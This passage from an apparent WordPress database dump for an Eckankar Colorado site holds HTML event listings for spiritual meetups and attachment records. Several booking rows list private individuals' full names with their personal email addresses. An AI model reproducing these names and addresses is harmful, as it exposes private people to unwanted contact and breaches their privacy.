17:57:00','2023-04-23 23:57:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Dreams are real!</span><br>\r\n<span style=\"font-size: 14pt;\">If you understand dreams and how they work, you can use your dreams to guide you and help you take steps forward, both spiritually, and in your daily life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Would you like help remembering your dreams?</strong></span><br>\r\n<span style=\"font-size: 14pt;\"><strong>Are you interested in tools to help you interpret your dreams?</strong></span><br>\r\n<span style=\"font-size: 14pt;\"><strong>Would you like to understand the spiritual nature of dreams?</strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, you would enjoy this discussion. We will share tools to help you remember and interpret your dreams. Along with talking about tools to guide you in dream exploration, we will offer some ideas to help you start dreaming with more intent. We call them spiritual exercises that you can practice before you sleep. Our goal is that each participant will gain a deeper understanding of their dream worlds from a spiritual perspective.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join the Spiritual Experiences Group of Pagosa Springs on May 14 at 1:00p for a lively discussion on&nbsp;<em>Your Source for Everyday Guidance: A Spiritual View of Dreams, Part One</em>. We will meet at the Pagosa Lakes Clubhouse, 230 Port Ave, in Pagosa Springs.</span><br>\r\n<span style=\"font-size: 14pt;\">For more information::</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/\" target=\"_blank\" rel=\"noopener\">Pagosa Springs Spiritual Experiences Group</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This free event is sponsored by Eckankar, the Path of Spiritual Freedom as a community service, a spiritual resource for people of all faiths and beliefs. It is an individual, creative practice to experience our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To read more about the hidden secrets of your dreams:</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/dreams/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Experience Dreams</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/292288843/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Your Source for Everyday Guidance: <br>A Spiritual View of Dreams, Part One<br>In Person Discussion','','publish','closed','closed','','your-source-for-everyday-guidance-a-spiritual-view-of-dreams-part-onein-person-discussion','','','2023-04-23 17:57:00','2023-04-23 23:57:00','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268420',0,'mec-events','',0),(268421,15,'2023-04-23 17:54:39','2023-04-23 23:54:39','','BlueArches','','inherit','closed','closed','','bluearches','','','2023-04-23 17:54:39','2023-04-23 23:54:39','',268420,'https://eckankar-colorado.org/wp-content/uploads/2023/04/BlueArches.webp',0,'attachment','image/webp',0),(268422,15,'2023-04-23 18:01:07','2023-04-24 00:01:07','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">How do miracles occur?</span><br>\r\n<span style=\"font-size: 14pt;\">Where does healing come from?</span><br>\r\n<span style=\"font-size: 14pt;\">How can you heal the past to help yourself now?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will discuss the many health benefits of spiritual living and practice techniques you can use for healing. Our goal is that you will see yourself and your state of health from a higher perspective than you’ve likely ever imagined possible.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says&nbsp;<em>“All the help that comes to us is from the Holy Spirit, whether it comes in a dream or through the help of a friend or a doctor. The trick is the discrimination you need: to tell what’s good for you and what’s not good for you.”</em></span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/292518012/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','12 Gifts of Spiritual Living: Health and Healing<br>In Person Discussion','','publish','closed','closed','','12-gifts-of-spiritual-living-health-and-healingin-person-discussion','','','2023-04-23 18:01:07','2023-04-24 00:01:07','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268422',0,'mec-events','',0),(268423,15,'2023-04-23 18:09:19','2023-04-24 00:09:19','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span><br>\r\n<br>\r\n<span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><br>\r\n<span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><br>\r\n<span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<div class=\"\"><span class=\"\" style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n<div></div>\r\n</div>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/292519345/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Explore a Daily Practice for More Joy, Wisdom and Peace - In Person Event','','publish','closed','closed','','explore-a-daily-practice-for-more-joy-wisdom-and-peace-in-person-event','','','2023-04-23 18:09:19','2023-04-24 00:09:19','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268423',0,'mec-events','',0),(268425,2,'2023-10-02 14:41:05','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>September 2023</strong> edition of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copy of the issue on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at <a class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 400;\" href=\"http://www.eckankar.org\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar.org</a> in the Members Area under \"<em>Your Spiritual Studies</em>.</span></strong></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>','Mystic World Discussion  --- ONLINE TEMPLATE','','draft','closed','closed','','','','','2023-10-02 14:41:05','2023-10-02 20:41:05','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268425',0,'mec-events','',0),(268426,2,'2023-04-23 21:34:46','2023-04-24 03:34:46','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of Eckankar —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for an in person discussion of the <strong>March 2023</strong> edition of the <em> Mystic&nbsp;</em> <em>World</em>. </span></div>\r\n<div></div>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">Please bring your copy of the March <em>Mystic World</em> newsletter to the discussion. </span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\"><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available to members online at the beginning of the month at <a href=\"http://www.eckankar.org\">Eckankar.org</a></span></span><span class=\"\" style=\"font-size: 14pt;\">, in the Members Area under \"<em>Your Spiritual Studies</em>.\"&nbsp;</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Mystic World Discussion - In Person','','publish','closed','closed','','mystic-world-discussion-in-person','','','2023-04-23 21:34:46','2023-04-24 03:34:46','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268426',0,'mec-events','',0),(268427,2,'2023-04-23 21:38:40','2023-04-24 03:38:40','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 20pt;\"><strong>Ignite Your Spiritual Growth</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 20pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.<br>\r\n</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Experience HU, The Sound of Soul - In Person','','publish','closed','closed','','experience-hu-the-sound-of-soul-in-person-8','','','2023-04-23 21:53:43','2023-04-24 03:53:43','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268427',0,'mec-events','',0),(268431,1000082,'2023-05-07 10:30:00','2023-05-07 16:30:00','','Paige Blake - Paigeblake89@yahoo.com','','publish','closed','closed','','paige-blake-paigeblake89yahoo-com','','','2023-05-07 10:30:00','2023-05-07 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268431',0,'mec-books','',0),(268434,0,'2023-04-26 05:58:30','2023-04-26 11:58:30','','','','publish','closed','closed','','268434','','','2023-04-26 05:58:30','2023-04-26 11:58:30','',0,'https://eckankar-colorado.org/nf_sub/268434/',0,'nf_sub','',0),(268435,0,'2023-04-26 06:01:08','2023-04-26 12:01:08','','','','publish','closed','closed','','268435','','','2023-04-26 06:01:08','2023-04-26 12:01:08','',0,'https://eckankar-colorado.org/nf_sub/268435/',0,'nf_sub','',0),(268464,0,'2023-05-10 23:04:57','2023-05-11 05:04:57','','','','publish','closed','closed','','268464','','','2023-05-10 23:04:57','2023-05-11 05:04:57','',0,'https://eckankar-colorado.org/nf_sub/268464/',0,'nf_sub','',0),(268447,2,'2023-05-02 21:42:38','2023-05-03 03:42:38','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"break-words\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You\'re invited to experience chanting HU, a love song to God, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">A divine sound courses through all life - through every blade of grass, every galaxy, every atom of our bodies. HU is an ancient, sacred name for God - a carrier of love between Soul and God. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. It is the clear Voice of God, with the power to transform the lead of the human consciousness into the gold of an enlightened Soul.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find your own proof of the love and power of HU.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar, the Path of Spiritual Freedom as a community service.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">For more information about HU, check out <a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">There is never a charge for this Meetup.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/293308441/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Ignite Your Spiritual Growth<br>Experience the Sound of Soul: HU<br>In Person','','publish','closed','closed','','loveland-sound-of-soul-event-in-person','','','2023-05-07 21:38:19','2023-05-08 03:38:19','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268447',0,'mec-events','',0),(268445,2,'2023-05-02 16:50:46','2023-05-02 22:50:46','','shariyat-book-3','','inherit','closed','closed','','shariyat-book-3','','','2023-05-02 16:50:46','2023-05-02 22:50:46','',268440,'https://eckankar-colorado.org/wp-content/uploads/2023/05/shariyat-book-3.jpg',0,'attachment','image/jpeg',0),(268449,2,'2023-05-02 21:55:18','2023-05-03 03:55:18','','hu-8','','inherit','closed','closed','','hu-8','','','2023-05-02 21:55:18','2023-05-03 03:55:18','',268447,'https://eckankar-colorado.org/wp-content/uploads/2023/05/hu-8.jpg',0,'attachment','image/jpeg',0),(268450,2,'2023-05-05 12:11:38','2023-05-05 18:11:38','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"break-words\">\r\n<p class=\"mb-4\"><span style=\"font-size: 18pt;\"><strong>Change your life with Divine Imagination</strong></span></p>\r\n<ul class=\"\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like to be the creator of your own world?</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you have a dream you’d like God’s help with?</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">In the Power of Divine Creativity, there is no limitation whatsoever.</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Learn how to ignite your creativity to solve problems and live in more joy, love and peace.</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are warmly invited to join in this spiritual discussion. We will be using exercises to help you gain awareness of God’s hand in you daily existence. The evening will include contemplation and discussion on how Spirit is always with you to help create the life you want to live.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book, ECKANKAR: <em>Ancient Wisdom for Today</em>,</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“When you let God into your life, divine love also enters. Experiences and coincidences you would have discounted as trivial before now become miraculous. Life itself is rich, and you discover the joy of service and charity. God’s love awakens your heart.”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To explore a deeper inner connection: <a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">For more info and more events: <a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar Colorado Website</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span class=\"\" style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofbv/events/293112035/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'Change Your Life With Divine Imagination\'<br>Boulder - In Person Discussion','','publish','closed','closed','','change-your-life-with-divine-imaginationboulder-in-person-discussion','','','2023-05-05 12:16:11','2023-05-05 18:16:11','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268450',0,'mec-events','',0),(268451,2,'2023-05-05 12:11:27','2023-05-05 18:11:27','','aspens-closeup-1','','inherit','closed','closed','','aspens-closeup-1','','','2023-05-05 12:11:27','2023-05-05 18:11:27','',268450,'https://eckankar-colorado.org/wp-content/uploads/2023/05/aspens-closeup-1.jpg',0,'attachment','image/jpeg',0),(268452,2,'2023-05-05 12:24:25','2023-05-05 18:24:25','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"break-words\">\r\n<p class=\"mb-4\"><span style=\"font-size: 18pt;\"><em>What is Spiritual Freedom?</em></span></p>\r\n<blockquote class=\"\" style=\"border-style: solid; border-width: 0px 0px 0px 4px; border-color: #1e63bc;\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em>“We have to be cause in our own lives and not the effect of others. That is the difference between being a free man and a slave.</em></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em>“Spiritual freedom is living to your full potential – heart, mind and Soul. What could be more satisfying?”</em></span><br>\r\n<span style=\"font-size: 14pt;\">—Harold Klemp, <em>ECK Wisdom on Spiritual Freedom</em>, p. 6</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">• What is spiritual freedom?</span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">• How do you live spiritual freedom?</span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">• How do you recognize opportunities to choose more spiritual freedom?</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are invited to join in this open discussion and share your experiences, or ask a related question that you may have.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will also be sharing a technique for expanding into a greater state of spiritual freedom.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Look for us in the hotel lobby with the Meetup sign. We are often seated in the back of the room.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-longmont/events/293070076/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','\'What Is Spiritual Freedom?\'<br>Longmont - In Person Discussion','','publish','closed','closed','','what-is-spiritual-freedomlongmont-in-person-discussion','','','2023-05-05 12:27:33','2023-05-05 18:27:33','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268452',0,'mec-events','',0),(268454,2,'2023-05-05 12:24:45','2023-05-05 18:24:45','','temple-columns-master','','inherit','closed','closed','','temple-columns-master','','','2023-05-05 12:24:45','2023-05-05 18:24:45','',268452,'https://eckankar-colorado.org/wp-content/uploads/2023/05/temple-columns-master.jpg',0,'attachment','image/jpeg',0),(268601,1000077,'2023-06-11 10:30:00','2023-06-11 16:30:00','','Gerald van Gogh - gvg1328@telus.net','','publish','closed','closed','','gerald-van-gogh-gvg1328telus-net-2','','','2023-06-11 10:30:00','2023-06-11 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268601',0,'mec-books','',0),(268602,1000024,'2023-06-11 10:30:00','2023-06-11 16:30:00','','Roger Morandi - rmorandi@comcast.net','','publish','closed','closed','','roger-morandi-rmorandicomcast-net-4','','','2023-06-11 10:30:00','2023-06-11 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268602',0,'mec-books','',0),(268457,0,'2023-05-06 06:40:35','2023-05-06 12:40:35','','','','publish','closed','closed','','268457','','','2023-05-06 06:40:35','2023-05-06 12:40:35','',0,'https://eckankar-colorado.org/nf_sub/268457/',0,'nf_sub','',0),(268458,0,'2023-05-06 06:50:33','2023-05-06 12:50:33','','','','publish','closed','closed','','268458','','','2023-05-06 06:50:33','2023-05-06 12:50:33','',0,'https://eckankar-colorado.org/nf_sub/268458/',0,'nf_sub','',0),(268459,1000078,'2023-05-07 10:30:00','2023-05-07 16:30:00','','Agnes R Hynes - amhynes7@msn.com','','publish','closed','closed','','agnes-r-hynes-amhynes7msn-com','','','2023-05-07 10:30:00','2023-05-07 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268459',0,'mec-books','',0),(268461,2,'2023-05-07 21:47:09','2023-05-08 03:47:09','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong><span class=\"\"><span style=\"font-size: 18pt;\">Have you lived before?</span> </span></strong></span></p>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\">Why are past lives significant? Are your dreams real experiences? Where do you go when you close your eyes? These are just some of the questions we\'ll explore in a book discussion class. There will be a total of 6 classes that meet monthly and this next class will focus on past lives.</span><br>\r\n<span class=\"\" style=\"font-size: 14pt;\">Classes are free and books will be provided. You do NOT have to read the books prior to class and you may attend all 6 classes or drop in when you can. If you have any questions or would like more info., please message me here on meetup.</span><br>\r\n<span style=\"font-size: 14pt;\">Looking forward to seeing you on the 20th!</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/293305394/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Past Lives, Dreams and Soul Travel','','draft','closed','closed','','past-lives-dreams-and-soul-travelbook-discussion-in-person','','','2023-10-28 21:29:07','2023-10-29 03:29:07','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268461',0,'mec-events','',0),(268462,2,'2023-05-07 21:46:56','2023-05-08 03:46:56','','villas-1','','inherit','closed','closed','','villas-1','','','2023-05-07 21:46:56','2023-05-08 03:46:56','',268461,'https://eckankar-colorado.org/wp-content/uploads/2023/05/villas-1.jpg',0,'attachment','image/jpeg',0),(268463,1000081,'2023-05-14 10:30:00','2023-05-14 16:30:00','','Eileen Joy - eileenjoy12@gmail.com','','publish','closed','closed','','eileen-joy-eileenjoy12gmail-com-2','','','2023-05-14 10:30:00','2023-05-14 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268463',0,'mec-books','',0),(268470,1000014,'2023-05-14 10:30:00','2023-05-14 16:30:00','','Kery Colvin - keanchico@yahoo.com','','publish','closed','closed','','kery-colvin-keanchicoyahoo-com-7','','','2023-05-14 10:30:00','2023-05-14 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268470',0,'mec-books','',0),(268471,1000047,'2023-05-14 10:30:00','2023-05-14 16:30:00','','Beth massengale - beth1848@yahoo.com','','publish','closed','closed','','beth-massengale-beth1848yahoo-com-2','','','2023-05-14 10:30:00','2023-05-14 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268471',0,'mec-books','',0),(268472,1000023,'2023-05-14 10:30:00','2023-05-14 16:30:00','','Bonnie Greenstreet - bngstreet@gmail.com','','publish','closed','closed','','bonnie-greenstreet-bngstreetgmail-com-7','','','2023-05-14 10:30:00','2023-05-14 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268472',0,'mec-books','',0),(268473,0,'2023-05-15 09:30:51','2023-05-15 15:30:51','','','','publish','closed','closed','','268473','','','2023-05-15 09:30:51','2023-05-15 15:30:51','',0,'https://eckankar-colorado.org/nf_sub/268473/',0,'nf_sub','',0),(268474,0,'2023-05-15 17:27:44','2023-05-15 23:27:44','','','','publish','closed','closed','','268474','','','2023-05-15 17:27:44','2023-05-15 23:27:44','',0,'https://eckankar-colorado.org/nf_sub/268474/',0,'nf_sub','',0),(268475,0,'2023-05-15 17:37:02','2023-05-15 23:37:02','','','','publish','closed','closed','','268475','','','2023-05-15 17:37:02','2023-05-15 